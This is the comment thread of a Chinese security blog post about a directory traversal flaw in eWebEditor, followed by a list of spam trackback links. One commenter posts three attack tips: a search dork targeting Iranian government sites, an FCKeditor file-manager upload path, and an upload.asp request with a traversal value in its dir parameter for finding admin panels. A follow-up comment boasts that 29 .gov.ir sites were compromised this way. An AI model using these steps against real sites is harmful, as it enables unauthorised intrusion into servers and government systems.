st0p's blog

35 Responses to “eWebEditor suffers from a directory traversal vulnerability”

1. By YoCo Smart on Feb 8, 2010 | Reply
   

   擦……这哪是伊朗人发现的。明明他们是这么被日的可好。前些日子我那哥们给我三个tip玩
   tip1：[To Parent Directory] inurl:.gov.ir/
   tip2：网站域名/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/php、aspx、jsp自己看网站环境选/connector.aspx、php、jsp自己选
   tip3：上传失败用upload.asp?id=16&d_viewmode=&dir =./..厉遍目录找后台

   

   st0p Reply:
   February 9th, 2010 at 5:19 pm

   唉，有点郁闷，不少人在转这个东西。
   现在在网上想找到原作者有点难吧。郁闷。。

   
   
2. By YoCo Smart on Feb 8, 2010 | Reply
   

   当时搜出来的29个.gov.ir都遭到毒手，就是这3个tip

   
   

1. 32 Trackback(s)

2. Nov 5, 2011: foundation repairs in Goodwins Corner IN
3. Nov 6, 2011: Loreal professional hair color
4. Nov 7, 2011: Free Psychic Reading
5. Nov 8, 2011: cricut cartridges
6. Nov 8, 2011: Healthy Choice coupon
7. Nov 8, 2011: PDAs
8. Nov 8, 2011: home improvement
9. Nov 10, 2011: Chapter13 Illinois
10. Nov 17, 2011: dove coupons
11. Nov 19, 2011: government grants
12. Nov 20, 2011: online public relations
13. Dec 19, 2011: Carrier Parts
14. Jan 6, 2012: roofing contractors Pleasant Hills OH
15. Jan 6, 2012: Warlock
16. Jan 8, 2012: my url
17. Jan 10, 2012: delete fan facebook
18. Jan 14, 2012: roofing in Enumclaw WA
19. Jan 16, 2012: extraction thimbles
20. Jan 17, 2012: deportiva
21. Jan 18, 2012: portarollo
22. Jan 19, 2012: Filter paper
23. Jan 23, 2012: amazon is my niche Keyword.
24. Jan 24, 2012: tanie czytanie
25. Jan 25, 2012: http://wallinside.com/post-1253448.html
26. Jan 26, 2012: Reifen
27. Jan 27, 2012: law firm in Long Island, NY
28. Jan 28, 2012: chicago limo service
29. Jan 29, 2012: Alpha Warranty
30. Feb 2, 2012: Top Penny Stocks
31. Feb 3, 2012: Domain Brokerage
32. Feb 5, 2012: loss of amenity
33. Feb 5, 2012: supermarket injury

You must be logged in to post a comment.